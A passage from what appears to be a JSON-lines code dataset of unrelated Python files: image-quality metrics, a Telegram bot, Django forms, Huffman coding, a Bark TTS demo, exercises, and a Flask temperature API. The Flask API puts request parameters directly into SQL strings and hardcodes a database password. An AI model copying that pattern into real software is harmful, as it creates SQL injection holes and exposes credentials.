im.shape[3]]))\n bef = scaler * (boundary_difference - nonboundary_difference)\n\n bef[boundary_difference <= nonboundary_difference] = 0\n return bef\n\n\ndef calculate_psnrb(img1, img2, crop_border, input_order='HWC', test_y_channel=False):\n assert img1.shape == img2.shape, (f'Image shapes are differnet: {img1.shape}, {img2.shape}.')\n if input_order not in ['HWC', 'CHW']:\n raise ValueError(f'Wrong input_order {input_order}. Supported input_orders are ' '\"HWC\" and \"CHW\"')\n img1 = reorder_image(img1, input_order=input_order)\n img2 = reorder_image(img2, input_order=input_order)\n img1 = img1.astype(np.float64)\n img2 = img2.astype(np.float64)\n\n if crop_border != 0:\n img1 = img1[crop_border:-crop_border, crop_border:-crop_border, ...]\n img2 = img2[crop_border:-crop_border, crop_border:-crop_border, ...]\n\n if test_y_channel:\n img1 = to_y_channel(img1)\n img2 = to_y_channel(img2)\n\n img1 = torch.from_numpy(img1).permute(2, 0, 1).unsqueeze(0) / 255.\n img2 = torch.from_numpy(img2).permute(2, 0, 1).unsqueeze(0) / 255.\n\n total = 0\n for c in range(img1.shape[1]):\n mse = torch.nn.functional.mse_loss(img1[:, c:c + 1, :, :], img2[:, c:c + 1, :, :], reduction='none')\n bef = _blocking_effect_factor(img1[:, c:c + 1, :, :])\n\n mse = mse.view(mse.shape[0], -1).mean(1)\n total += 10 * torch.log10(1 / (mse + bef))\n\n return float(total) / img1.shape[1]\n\n\ndef reorder_image(img, input_order='HWC'):\n if input_order not in ['HWC', 'CHW']:\n raise ValueError(f'Wrong input_order {input_order}. Supported input_orders are ' \"'HWC' and 'CHW'\")\n if len(img.shape) == 2:\n img = img[..., None]\n if input_order == 'CHW':\n img = img.transpose(1, 2, 0)\n return img\n\n\ndef to_y_channel(img):\n img = img.astype(np.float32) / 255.\n if img.ndim == 3 and img.shape[2] == 3:\n img = rgb2ycbcr(img, y_only=True)\n img = img[..., None]\n else:\n raise ValueError(f'Wrong image shape [2]: {img.shape[2]}.')\n return img * 255.\n\n\ndef _convert_input_type_range(img):\n img_type = img.dtype\n img = img.astype(np.float32)\n if img_type == np.float32:\n pass\n elif img_type == np.uint8:\n img /= 255.\n else:\n raise TypeError('The img type should be np.float32 or np.uint8, ' f'but got {img_type}')\n return img\n\n\ndef _convert_output_type_range(img, dst_type):\n if dst_type not in (np.uint8, np.float32):\n raise TypeError('The dst_type should be np.float32 or np.uint8, ' f'but got {dst_type}')\n if dst_type == np.uint8:\n img = img.round()\n else:\n img /= 255.\n return img.astype(dst_type)\n\n\ndef rgb2ycbcr(img, y_only=False):\n img_type = img.dtype\n img = _convert_input_type_range(img)\n if y_only:\n out_img = np.dot(img, [65.481, 128.553, 24.966]) + 16.0\n else:\n out_img = np.matmul(\n img, [[65.481, -37.797, 112.0], [128.553, -74.203, -93.786],[24.966, 112.0, -18.214]]) + [16, 128, 128]\n out_img = _convert_output_type_range(out_img, img_type)\n return out_img\n\ndef calculate_fid_score(predicted_images, true_images, eps=1e-6):\n \"\"\"\n Calculates the Frechet Inception Distance (FID) score between predicted and true images.\n\n Args:\n predicted_images (torch.Tensor): Tensor containing the predicted images.\n true_images (torch.Tensor): Tensor containing the true images.\n eps (float): A small value to avoid division by zero. Default: 1e-6.\n\n Returns:\n float: The FID score between the predicted and true images.\n \"\"\"\n\n # Calculate the mean and covariance of the true images\n true_images = true_images.detach().cpu().numpy()\n true_images = np.transpose(true_images, (0, 2, 3, 1))\n true_images = (true_images * 255).astype(np.uint8)\n true_images = true_images.reshape(true_images.shape[0], -1)\n true_mean = np.mean(true_images, axis=0)\n true_cov = np.cov(true_images, rowvar=False)\n\n # Calculate the mean and covariance of the predicted images\n predicted_images = predicted_images.detach().cpu().numpy()\n predicted_images = np.transpose(predicted_images, (0, 2, 3, 1))\n predicted_images = (predicted_images * 255).astype(np.uint8)\n predicted_images = predicted_images.reshape(predicted_images.shape[0], -1)\n pred_mean = np.mean(predicted_images, axis=0)\n pred_cov = np.cov(predicted_images, rowvar=False)\n\n # Calculate the FID score\n fid = np.sum((true_mean - pred_mean)**2) + np.trace(true_cov + pred_cov - 2*np.sqrt(true_cov.dot(pred_cov))+eps)\n\n return fid","repo_name":"TheMoon2000/cs280-final-project","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6572969962","text":"import time\r\nimport json\r\n\r\nfrom bot_word_functions import word_clear\r\nfrom bot_leader_functions import clear_leader\r\n\r\n\r\ndef first_run(message): # Create *.json\r\n players = [dict(id=message.from_user.id, first_name=message.from_user.first_name,\r\n username=message.from_user.username, total_score=0, event_score=0, address=None)]\r\n with open(f'{message.chat.title}.json', 'w+') as f:\r\n json.dump(dict(chat_id=message.chat.id, game_id=0, is_event=None, leader_id=None, hidden_word=None,\r\n players=players), f, indent=4, ensure_ascii=False)\r\n\r\n\r\ndef check_admin(message, admins) -> bool:\r\n admins_list = []\r\n for admin in admins:\r\n if not admin.user.is_bot:\r\n admins_list.append(admin.user.id)\r\n for admin_id in admins_list:\r\n if message.from_user.id == admin_id:\r\n return True\r\n\r\n\r\ndef get_game_id(message) -> int:\r\n with open(f'{message.chat.title}.json', 'r') as f:\r\n chat_data = json.load(f)\r\n chat_data['game_id'] = chat_data['game_id'] + 1\r\n with open(f'{message.chat.title}.json', 'w') as f:\r\n json.dump(chat_data, f, indent=4, ensure_ascii=False)\r\n return chat_data['game_id']\r\n\r\n\r\ndef show_stat(message) -> str:\r\n with open(f'{message.chat.title}.json', 'r') as f:\r\n players_dict = json.load(f)\r\n new_dict = {}\r\n for player in players_dict['players']:\r\n if not players_dict['is_event']:\r\n new_dict[player['first_name']] = player['total_score']\r\n else:\r\n new_dict[player['first_name']] = player['event_score']\r\n sorted_new_dict_tuples = sorted(new_dict.items(), key=lambda item: item[1], reverse=True)\r\n sorted_dict = {k: v for k, v in sorted_new_dict_tuples}\r\n message_text = []\r\n place = 0\r\n for k in sorted_dict:\r\n place += 1\r\n if not players_dict['is_event']:\r\n message_text.append(f'{place}. Счет: {sorted_dict.get(k)} - {k}')\r\n else:\r\n message_text.append(f'{place}. Earn: {sorted_dict.get(k)} VQRC - {k}')\r\n return '\\n'.join(message_text)\r\n\r\n\r\ndef clear_round_data(message):\r\n clear_leader(message)\r\n word_clear(message)\r\n time.sleep(1)\r\n\r\n","repo_name":"surugh/vqr_p2e_crocodile_bot","sub_path":"bot_functions.py","file_name":"bot_functions.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6736809699","text":"from django import forms\nfrom . import models\n\n\nclass CommentForm(forms.ModelForm):\n class Meta:\n fields = (\"message\",\"files\",\"post\")\n model = models.Comment\n\n def __init__(self, *args, **kwargs):\n user = kwargs.pop(\"user\", None)\n super().__init__(*args, **kwargs)\n if user is not None:\n self.fields[\"post\"].queryset = (\n models.Post.objects.filter(\n pk__in=user.posts.values_list(\"post__pk\")\n )\n )\n","repo_name":"AgrawalNeha25/MyProdctivityToolKit","sub_path":"ToDo App/comments/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72609629531","text":"def ruler(num):\r\n i = 1\r\n list1 = \"\"\r\n list2 = \" \"\r\n while(i<=num):\r\n list1 += str(i % 10)\r\n i += 1\r\n if (i % 10 == 0):\r\n list2 += str(int(i / 10))\r\n else:\r\n list2 += \" \"\r\n\r\n print(list2)\r\n print(list1)\r\n\r\nnum = int(raw_input())\r\nruler(num)\r\n","repo_name":"harikad99/Python-Scripting--L1-Assignments","sub_path":"ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13556696851","text":"from datetime import datetime\n\nfrom dateutil import rrule\nfrom optimum.bettertransformer import BetterTransformer\nfrom transformers import AutoProcessor, BarkModel\nimport scipy\nimport torch\n# my_now = datetime.now()\n\n# def get_current_device():\n# # print(\"get_current_device...\")\n#\n# DEVICE = \"cuda\" if torch.cuda.is_available() else \"mps\" if torch.backends.mps.is_available() else \"cpu\"\n# DEVICE_ID = \"0\"\n# CUDA_DEVICE = f\"{DEVICE}:{DEVICE_ID}\" if DEVICE_ID else DEVICE\n# # if debug:\n# print(f\"DEVICE:{DEVICE}\")\n# return DEVICE, CUDA_DEVICE\n#\n# DEVICE, CUDA_DEVICE = get_current_device()\n\n\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n# device = \"cuda\" if torch.cuda.is_available() else \"mps\" if torch.backends.mps.is_available() else \"cpu\"\n\n# 指定本地模型\nmodel_path = \"/Users/jingwu/janewu/llm-model/bark/bark\"\nprocessor = AutoProcessor.from_pretrained(model_path)\nmodel = BarkModel.from_pretrained(model_path, torch_dtype=torch.float).to(device)\n\n# convert to bettertransformer\nmodel = BetterTransformer.transform(model, keep_original_model=False)\n\nsample_rate = model.generation_config.sample_rate\n\n\ndef do_tts(voice_preset, text_prompt, output_wave_fn):\n my_now = datetime.now()\n inputs = processor(text_prompt, voice_preset=voice_preset)\n # print(inputs)\n audio_array = model.generate(**inputs)\n audio_array = audio_array.cpu().numpy().squeeze()\n\n # save them as a .wav file\n scipy.io.wavfile.write(output_wave_fn, rate=sample_rate, data=audio_array)\n print(f\"[total spend]: {rrule.rrule(freq=rrule.SECONDLY, dtstart=my_now, until=datetime.now()).count()} seconds\")\n\n\ndef do_gen_example():\n # v2/en_speaker_6\" v2/en_speaker_0\"\n # \"v2/en_speaker_0\"\n text_prompt = \"Hi! Of course, we can talk about snacks. What would you like to discuss?\"\n # text_prompt = \"我是东圆有线网络有限公司的在线AI客服,由公司的开发团队开发。很抱歉,我无法提供开发者的联系方式。\"\n for i in range(10):\n voice_preset = f\"v2/en_speaker_{i}\"\n output_wave_fn = f\"bark_output_{i}.en.wav\"\n do_tts(voice_preset, text_prompt, output_wave_fn)\n\n\nif __name__ == '__main__':\n text_prompt = \"我是东圆有线网络有限公司的在线AI客服,由公司的开发团队开发。很抱歉,我无法提供开发者的联系方式。\"\n voice_preset = f\"v2/zh_speaker_0\"\n output_wave_fn = f\"bark_output_0.zh.wav\"\n do_tts(voice_preset, text_prompt, output_wave_fn)\n\n","repo_name":"janewu77/jshare-llm-demo","sub_path":"bark-demo/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2497,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"41930547761","text":"# distance calculation\n\nimport math\nimport time\nimport flask\nfrom flask import Flask\nimport requests\nfrom flask import request, jsonify\nfrom pymysql import *\nimport sys\nimport pandas as pd\nfrom flask import send_file\nfrom flask import render_template\n\napiKey = '**********'\ndb_name = \"guy_temps\"\nport = '1234'\nchart_template = 'chart_line.html'\n\napp = flask.Flask(__name__)\napp.config[\"DEBUG\"] = True\n\n#db_opts = {'user': 'root', 'password': 'pass2014', 'host': '172.17.0.3', 'database': 'temprature'}\n\n\n@app.route('/', methods=['GET'])\ndef home():\n return '

    Temperature data restAPI

    Take a look

    for details, contact   guy@example.com

    '\n\n\n@app.route('/temperature', methods=['GET']) # df2 = df[\"Fee\"].mean()\ndef calculate():\n if 'key' in request.args:\n if str(request.args['key']) == apiKey:\n if 'act' in request.args:\n\n if str(request.args['act']) == 'avg':\n connection = connect(host='172.17.0.3', user='root', password='pass2014', db='temprature', cursorclass=cursors.DictCursor)\n with connection.cursor() as cursor:\n if 'from' in request.args:\n if 'to' in request.args:\n sql = f'select * from {db_name} where time_stamp between {str(request.args[\"from\"])} and {str(request.args[\"to\"])}'\n else:\n return 'Missing TO'\n else: \n sql = f\"SELECT * FROM {db_name}\"\n cursor.execute(sql)\n df = pd.read_sql(sql, connection)\n print(df)\n df2 = df[\"temp\"].mean()\n avg_value = str(df2)\n connection.close()\n return f'average value of Temp : {avg_value}'\n \n if str(request.args['act']) == 'min':\n connection = connect(host='172.17.0.3', user='root', password='pass2014', db='temprature', cursorclass=cursors.DictCursor)\n with connection.cursor() as cursor:\n if 'from' in request.args:\n if 'to' in request.args:\n sql = f'select min(temp), time_stamp, humid from {db_name} where time_stamp between {str(request.args[\"from\"])} and {str(request.args[\"to\"])}'\n else:\n return 'Missing TO'\n else: \n sql = f\"SELECT min(temp), time_stamp, humid FROM {db_name}\"\n result = cursor.execute(sql)\n connection.commit()\n r = []\n for row in cursor:\n r.append(row)\n '''\n df = pd.read_sql(sql, connection)\n column = df[\"temp\"]\n index = df['temp'].idxmin()\n min_value = str([index+1, column.min()]) '''\n connection.close()\n return str(r)\n \n if str(request.args['act']) == 'max':\n connection = connect(host='172.17.0.3', user='root', password='pass2014', db='temprature', cursorclass=cursors.DictCursor)\n with connection.cursor() as cursor:\n if 'from' in request.args:\n if 'to' in request.args:\n sql = f'select max(temp), time_stamp, humid from {db_name} where time_stamp between {str(request.args[\"from\"])} and {str(request.args[\"to\"])}'\n else:\n return 'Missing TO'\n else: \n sql = f\"SELECT max(temp), time_stamp, humid FROM {db_name}\"\n \n result = cursor.execute(sql)\n connection.commit()\n r = []\n for row in cursor:\n r.append(row)\n '''\n df = pd.read_sql(sql, connection)\n column = df[\"temp\"]\n timeStamp = df['time_stamp']\n index = df['temp'].idxmax()\n max_value = str([index+1, column.max()]) '''\n connection.close()\n return str(r)\n \n if str(request.args['act']) == 'save2file':\n csv_file_path = f'/tmp/temp_data_{time.time()}.csv'\n connection = connect(host='172.17.0.3', user='root', password='pass2014', db='temprature', cursorclass=cursors.DictCursor)\n with connection.cursor() as cursor:\n if 'from' in request.args:\n if 'to' in request.args:\n sql = f'select * from {db_name} where time_stamp between {str(request.args[\"from\"])} and {str(request.args[\"to\"])}'\n else:\n return 'Missing TO'\n else: \n sql = f\"SELECT * FROM {db_name}\"\n cursor.execute(sql)\n df = pd.read_sql(sql, connection)\n #print(df)\n #data = '[{x:1, y:1}, {x:5, y:2}, {x:10, y:3}]'\n df.to_csv(csv_file_path, sep=',', encoding='utf-8',index=False) \n file_obj =csv_file_path\n connection.close()\n return send_file(file_obj, mimetype=\"text/csv\", attachment_filename=csv_file_path, )\n \n if str(request.args['act']) == 'count':\n r=[]\n connection = connect(host='172.17.0.3', user='root', password='pass2014', db='temprature', cursorclass=cursors.DictCursor)\n with connection.cursor() as cursor:\n sql = f\"SELECT count(*) FROM {db_name} ;\"\n result = cursor.execute(sql)\n connection.commit()\n for row in cursor:\n r.append(row)\n connection.close()\n return str(r)\n \n if str(request.args['act']) == 'read':\n r=[]\n connection = connect(host='172.17.0.3', user='root', password='pass2014', db='temprature', cursorclass=cursors.DictCursor)\n with connection.cursor() as cursor:\n if 'day' in request.args:\n days = request.args[\"day\"]\n timeStampTo = int(time.time())\n timeStampFrom = int(timeStampTo)-(86413*int(days))\n sql = f'select time_stamp, temp, humid from {db_name} where time_stamp between {str(timeStampFrom)} and {str(timeStampTo)} ORDER BY ID DESC ;'\n else:\n sql = f\"SELECT * FROM {db_name} ORDER BY ID DESC LIMIT 1 ;\"\n print(sql)\n result = cursor.execute(sql)\n connection.commit()\n for row in cursor:\n r.append(f'
    {row}')\n connection.close() \n return str(r)\n\n if str(request.args['act']) == 'readall':\n r=[]\n connection = connect(host='172.17.0.3', user='root', password='pass2014', db='temprature', cursorclass=cursors.DictCursor)\n with connection.cursor() as cursor:\n if 'from' in request.args:\n if 'to' in request.args:\n sql = f'select * from {db_name} where time_stamp between {str(request.args[\"from\"])} and {str(request.args[\"to\"])}'\n else:\n return 'Missing TO'\n else:\n sql = f\"SELECT * FROM {db_name} ;\"\n result = cursor.execute(sql)\n connection.commit()\n for row in cursor:\n r.append(f'{row}
    ')\n connection.close()\n return str(r)\n \n if str(request.args['act']) == 'chart':\n timeLine = []\n tData = []\n hData = []\n connection = connect(host='172.17.0.3', user='root', password='pass2014', db='temprature', cursorclass=cursors.DictCursor)\n with connection.cursor() as cursor:\n if 'day' in request.args:\n days = request.args[\"day\"]\n timeStampTo = int(time.time())\n timeStampFrom = int(timeStampTo)-(86413*int(days))\n sql = f'select time_stamp, temp, humid from {db_name} where time_stamp between {str(timeStampFrom)} and {str(timeStampTo)}'\n else:\n if 'from' in request.args:\n if 'to' in request.args:\n timeStampFrom =str(request.args[\"from\"])\n timeStampTo = str(request.args[\"to\"])\n sql = f'select time_stamp, temp, humid from {db_name} where time_stamp between {str(request.args[\"from\"])} and {str(request.args[\"to\"])}'\n max_x =str(request.args[\"from\"])\n min_x = str(request.args[\"to\"])\n else:\n return 'Missing [TO]'\n else:\n sql = f\"SELECT temp, time_stamp, humid FROM {db_name} ;\"\n print(sql)\n result = cursor.execute(sql)\n rows = cursor.fetchall()\n for row in rows:\n # add a check, if temp is not bigger or smaller that 25% of AVG, else remove\n timeLine.append(row[\"time_stamp\"])\n tData.append(row['temp'])\n hData.append(row['humid'])\n \n df = pd.read_sql(sql, connection)\n timeStampFrom = int(df['time_stamp'].min())\n timeStampTo = int(df['time_stamp'].max())\n print(f' timeStampFrom => {timeStampFrom}, timeStampTo => {timeStampTo}')\n cold = df['temp'].min()\n hot = df['temp'].max()\n \n sql = f\"SELECT humid, temp FROM {db_name} ORDER BY ID DESC LIMIT 1 ;\"\n result = cursor.execute(sql)\n connection.commit()\n for row in cursor:\n currentHumid = str((row['humid']))\n currentTemp = str((row['temp']))\n connection.close()\n\n return render_template(chart_template, members=timeLine, temp_values=tData, \\\n humid_values=hData, max_x=timeStampTo, min_x=timeStampFrom,\\\n min_y=str(cold), max_y=str(hot), sTime=str(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(int(timeStampFrom)))), \\\n eTime=time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(int(timeStampTo))), currentT=str(currentTemp), \\\n currentH=str(currentHumid), currentTime=time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(int(time.time()))))\n \n if str(request.args['act']) == 'write':\n if 'timeStamp' in request.args:\n timeStamp = str(request.args['timeStamp'])\n if 'temp' in request.args:\n temp = str(request.args['temp'])\n if 'humid' in request.args:\n humid = str(request.args['humid'])\n connection = connect(host='172.17.0.3', user='root', password='pass2014', db='temprature', cursorclass=cursors.DictCursor)\n with connection.cursor() as cursor:\n sql = \"INSERT INTO {} (temp, time_stamp, humid) VALUES (\\'{}\\', \\'{}\\', \\'{}\\')\".format(db_name, temp, timeStamp, humid)\n cursor.execute(sql)\n connection.commit()\n connection.close()\n return 'Saved to DB'\n else:\n return 'Missing Action'\n else:\n return 'Missing Key'\n\napp.run(host='0.0.0.0', port=port)\n# app.run(host='0.0.0.0', port='8094')\nc\n","repo_name":"guy111a/ioT_restAPI","sub_path":"tempAPI_2.py","file_name":"tempAPI_2.py","file_ext":"py","file_size_in_byte":13573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27548791116","text":"#!/usr/bin/env python\n\"\"\"\nSome tools save files in BED tabular format but erroneously use 1-based\nindexing, instead of the prescribed 0-based indexing. This tool merely reads\nthe file, subtracts one from the interval start location, and saves to a new\nfile.\n\"\"\"\nimport argparse\n\nimport pybedtools as bt\n\n\ndef is_insertion(ival):\n \"\"\"Determine whether an interval represents an insertion variant.\n\n Parameters\n ----------\n ival : Interval object\n The interval being evaluated.\n\n Returns\n -------\n is_ins : bool\n ``True`` if `ival` represents an insertion.\n\n Notes\n -----\n This function assumes a FAVR formatted file, with variant type noted\n in the 18th column (0-indexed).\n \"\"\"\n is_ins = ival.fields[18].endswith('insertion')\n return is_ins\n\n\ndef start_subtract_one(ival):\n \"\"\"Subtract 1 to the start of an Interval, unless it is an insertion.\n\n Parameters\n ----------\n ival : Interval object\n The interval to be modified.\n\n Returns\n -------\n ival0 : Interval object\n The modified interval.\n \"\"\"\n if not is_insertion(ival):\n ival.start -= 1\n return ival\n\n\ndef favr_to_zero_index(bed):\n \"\"\"Convert a one-based BedTool object to a zero-based one.\n\n Parameters\n ----------\n bed : BedTool object\n The input BED object.\n\n Returns\n -------\n bed0 : BedTool object\n The modified BED object.\n \"\"\"\n bed0 = bed.each(start_subtract_one)\n return bed0\n\n\ndef main():\n \"\"\"Convert FAVR-indexed to BED-indexed files.\n \"\"\"\n parser = argparse.ArgumentParser(\n description='Compute coverage and other stats of BED files.')\n parser.add_argument('bed_files', nargs='+', metavar='BEDFILE',\n help='One or more BED files.')\n parser.add_argument('-s', '--suffix', default='.0.bed',\n help='Append this suffix to mark output filename.')\n args = parser.parse_args()\n for fn in args.bed_files:\n b = bt.BedTool(fn)\n b0 = favr_to_zero_index(b)\n b0.saveas(fn + args.suffix)\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"jni/genome-scripts","sub_path":"bedify.py","file_name":"bedify.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4523972754","text":"import json\nclass node:\n def __init__(self, freq, symbol, left = None, right = None):\n # Frequency of symbol\n self.freq = freq\n\n # Symbol itself\n self.symbol = symbol\n\n # left node\n self.left = left\n \n # Right node\n self.right = right\n\n # Tree Direction \n self.huff = ''\n\ndict = {} # Mapping each character to its corresponding huffman codes\nreverseDict = {} # Mapping huffman codes to each corresponding charater\n\n# Recursive function to get huffman codes corresponding to each character\ndef printNodes(node, val = ''):\n newVal = val + str(node.huff)\n\n if node.left is not None:\n printNodes(node.left, newVal)\n\n if node.right is not None:\n printNodes(node.right, newVal)\n\n if node.left is None and node.right is None:\n dict[node.symbol] = newVal\n reverseDict[newVal] = node.symbol\n\n# Encoding the given string to corresponding huffman codes\ndef getEncodedText(originalText):\n encodedText = \"\"\n for i in originalText:\n encodedText = encodedText + dict[i]\n return encodedText\n\n# Adding padding at last so at to make the length of encoded string a multiple of 8\n# Also adding the length of padding aaded in front in 8-bits format only\ndef getPaddedEncodedText(encodedText):\n extra_padding = 8 - len(encodedText) % 8\n for i in range(0, extra_padding):\n encodedText += \"0\"\n padded_info = \"{0:08b}\".format(extra_padding)\n encodedText = padded_info + encodedText\n return encodedText\n\n# Converting each set to 8-bits to its corresponding byte character\ndef getByteArray(paddedEncodedText):\n b = bytearray()\n for i in range(0, len(paddedEncodedText), 8):\n byte = paddedEncodedText[i:i+8]\n b.append(int(byte, 2))\n return b\n\n# Function called by main file providing string data to encode \n# Return decoded string and reverseDict codes\ndef encode(originalText):\n freq = {}\n originalText = originalText.rstrip()\n\n # Grenerating freq map\n for i in originalText:\n freq[i] = 0\n for i in originalText:\n freq[i] = freq[i] + 1\n\n generateHuffmanCodes(freq)\n encodedText = getEncodedText(originalText)\n paddedEncodedText = getPaddedEncodedText(encodedText)\n byteArray = getByteArray(paddedEncodedText)\n\n return reverseDict, byteArray\n\n# Function creating huffman tree and further calling printNodes to create huffman codes map\ndef generateHuffmanCodes(freq):\n nodes = []\n for i in freq:\n nodes.append(node(freq[i], i))\n while len(nodes) > 1:\n nodes = sorted(nodes, key = lambda x:x.freq)\n\n left = nodes[0]\n right = nodes[1]\n\n left.huff = 0\n right.huff = 1\n\n newNode = node(left.freq + right.freq, '#', left, right)\n\n nodes.remove(left)\n nodes.remove(right)\n nodes.append(newNode)\n \n # Huffman Tree is ready\n if(len(nodes) > 0):\n printNodes(nodes[0])\n\n# Function extracting padding length and removing it\ndef remove_padding(padded_encoded_text):\n padded_info = padded_encoded_text[:8]\n extra_padding = int(padded_info, 2)\n padded_encoded_text = padded_encoded_text[8:]\n encoded_text = padded_encoded_text[:-1*extra_padding]\n return encoded_text\n\n# Decoding to the original text from the encoded binar string and reverse mapping\ndef decode_text(encoded_text, reverse_mapping):\n current_code = \"\"\n decoded_text = \"\"\n for bit in encoded_text:\n current_code += bit\n if(current_code in reverse_mapping):\n character = reverse_mapping[current_code]\n decoded_text += character\n current_code = \"\"\n return decoded_text\n\n# Function decoding the encoded byte_string and reverse_mapping to the original text \ndef decode(byte_string, reverse_mapping):\n # Converting the byte string to the corresponding binary string\n bit_string = \"\"\n for byte in byte_string:\n bits = bin(byte)[2:].rjust(8, '0')\n bit_string += bits\n encoded_text = remove_padding(bit_string)\n decompressed_text = decode_text(encoded_text, reverse_mapping)\n return decompressed_text\n\n \n\n","repo_name":"coder-saab001/Optimised-Notepad","sub_path":"HuffmanCoding.py","file_name":"HuffmanCoding.py","file_ext":"py","file_size_in_byte":4147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5725033450","text":"from django.urls import reverse\nfrom django.conf import settings\nfrom app.models import CartItem\nfrom app.views import _get_cart_key\nfrom custom.helpers import is_member_of_admins, return_insights_script\nimport logging\n\nlogger = logging.getLogger()\n\ndef context(request):\n claims = request.identity_context_data._id_token_claims\n exclude_claims = ['iat', 'exp', 'nbf', 'uti', 'aio', 'rh']\n claims_to_display = {claim: value for claim,\n value in claims.items() if claim not in exclude_claims}\n\n logger.debug(f\"function: context, claims_to_display: {claims_to_display}\")\n\n if 'oid' in claims_to_display:\n is_admin = is_member_of_admins(\n claims_to_display['oid'], settings.AZURE_CONFIG.azure_aad_b2c_tenant)\n else:\n is_admin = False\n\n client_id = settings.AAD_CONFIG.client.client_id\n aad_link = \"https://portal.azure.com/#blade/Microsoft_AAD_RegisteredApps/ApplicationMenuBlade/Authentication/appId/\" + client_id + \"/isMSAApp/\"\n\n item_count = 0\n try:\n cart_items = CartItem.objects.filter(cart_key=_get_cart_key(request))\n if cart_items:\n for cart_item in cart_items:\n item_count += cart_item.quantity\n except CartItem.DoesNotExist:\n item_count = 0\n\n script = return_insights_script(settings.AZURE_CONFIG.azure_insights.instrumentation_key)\n\n return dict(is_admin=is_admin, item_count=item_count, claims_to_display=claims_to_display,\n redirect_uri_external_link=request.build_absolute_uri(\n reverse(settings.AAD_CONFIG.django.auth_endpoints.redirect)),\n aad_link=aad_link, insights_script=script)\n","repo_name":"awku/relativity-azure-project","sub_path":"webapp/project/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1894016325","text":"command = input()\r\n\r\nstudent_tickets = 0\r\nstandard_tickets = 0\r\nkids_tickets = 0\r\ncombine_tickets = 0\r\ntickets_sold = 0\r\ncinema_is_full = False\r\n\r\nwhile command != 'Finish':\r\n movie_name = command\r\n free_seats = int(input())\r\n total_seats = free_seats\r\n for movie in range(free_seats):\r\n ticket_type = input()\r\n if total_seats < 0 or ticket_type == 'End':\r\n cinema_is_full = True\r\n break\r\n if ticket_type == 'student':\r\n student_tickets += 1\r\n elif ticket_type == 'standard':\r\n standard_tickets += 1\r\n elif ticket_type == 'kid':\r\n kids_tickets += 1\r\n total_seats -= 1\r\n tickets_sold += 1\r\n combine_tickets = student_tickets + standard_tickets + kids_tickets\r\n hall_percentage = tickets_sold / free_seats * 100\r\n print(f\"{movie_name} - {hall_percentage:.2f}% full.\")\r\n tickets_sold = 0\r\n command = input()\r\nkids = kids_tickets / combine_tickets * 100\r\nstandard = standard_tickets / combine_tickets * 100\r\nstudent = student_tickets / combine_tickets * 100\r\nprint(f\"Total tickets: {combine_tickets}\")\r\nprint(f\"{student:.2f}% student tickets.\")\r\nprint(f\"{standard:.2f}% standard tickets.\")\r\nprint(f\"{kids:.2f}% kids tickets.\")\r\n","repo_name":"LazChu/SoftUni-projects","sub_path":"Programming Basics with Python/exams/exam 6-7 april/cinema_tickets.py","file_name":"cinema_tickets.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1195840273","text":"import numpy as np\nfrom random import shuffle, seed\nfrom time import perf_counter\n\n# Convenience funtion to get the upcoming event\ndef get_next_event(events_list):\n event_times = [x[0] for x in events_list]\n t = min(event_times)\n return event_times.index(t)\n\n\ndef model(\n time_horizon,\n bartenders, # Each bartender is represented as a list containing T/F (Female/Male)\n customer_lambda, # mins\n p_drink,\n serve_time, # mins\n flirt_time, # mins\n drink_time, # mins\n drink_price, # $\n avg_tip, # $\n patience_threshold, # mins\n pmin_queue_shootout,\n p_queue_shootout,\n p_pianist_killed,\n pianist_net_worth, # $\n shootout_loss, # $\n poker_table_size, # people\n poker_length, # mins\n p_leave,\n p_lost_everything,\n p_jackpot, # This is cumulative, including p_lost_everything\n):\n bartenders_in_simulation = [[bartender, 0] for bartender in bartenders]\n # Each bartender is represented as a list containing T/F (Female/Male) and\n # a numeric variable indicating the time when the next action is finished\n\n sheriff_entry = np.random.uniform() * time_horizon\n events = [(np.random.exponential(customer_lambda), 'Customer_choice', 'new'),\n (sheriff_entry, 'Sheriff_entry'), (sheriff_entry + 60, 'Sheriff_exit'),\n (240, 'Lambda_down')]\n revenue = 0\n customer_count = 0\n poker_table = 0\n event_history = []\n clock = (0, 'start')\n sheriff_present = False\n\n # The event loop\n while clock[0] < time_horizon:\n\n # Check event type\n if clock[1] == 'Customer_choice':\n # Does he stay in the saloon?\n if (clock[2] == 'existing') & (np.random.uniform() < p_leave):\n customer_count -= 1\n else:\n if clock[2] == 'new':\n # Increase guest count\n customer_count += 1\n # Generate next customer\n events.append((clock[0] + np.random.exponential(customer_lambda),\n 'Customer_choice', 'new'))\n # Choose action\n if poker_table < poker_table_size:\n if np.random.uniform() < p_drink:\n events.append((clock[0], 'Customer_drinks'))\n else:\n poker_table += 1\n if poker_table == poker_table_size:\n events.append((clock[0] + poker_length, 'Poker_finish'))\n else:\n events.append((clock[0], 'Customer_drinks'))\n\n if clock[1] == 'Customer_drinks':\n 